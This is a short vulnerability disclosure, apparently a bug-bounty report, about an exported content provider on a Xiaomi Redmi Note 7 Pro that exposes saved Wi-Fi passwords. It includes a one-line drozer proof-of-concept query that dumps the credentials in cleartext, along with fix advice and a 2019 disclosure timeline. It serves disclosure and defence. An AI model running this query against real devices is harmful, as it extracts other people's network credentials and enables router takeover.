Disclosing wifi password via content provider injection in Xiaomi

Summary:

The saved Wi-Fi passwords in Android are stored in the data\misc\wifi directory which can only be accessed if you have root access. So in general you cannot list or access the /data directory until and unless you have root access or the files are world readable writable .

Device used:

(Xiaomi Redmi note 7 pro 9)

➜ appreview adb shell getprop | grep -E "ro.miui.region|ro.build.fingerprint"
[ro.build.fingerprint]: [xiaomi/violet/violet:9/PKQ1.181203.001/V10.3.13.0.PFHINXM:user/release-keys]
[ro.miui.region]: [IN]

Poc steps:

Connect the device and run the below drozer command it will dump the wifi passwords along with other details in cleartext

run app.provider.query content://wifi/wifi

Fix:

Don’t export the content provider containing user information.
Protect it via custom permissions.

Or store it in encrypted format.

Impact

Any app within the system can query and fetch wifi credentials which is not permitted by default by the system because to access the stored password the device need to be rooted but here it is easily available using which malicious app can login into victims router and can also alter the dns settings which will disclose user browsing activites to the attacker

Disclosure Timeline

Reported on Jul 18th 2019
Triaged on Jul 18th 2019
Fix reviewed and ticket closure on Sep 11th 2019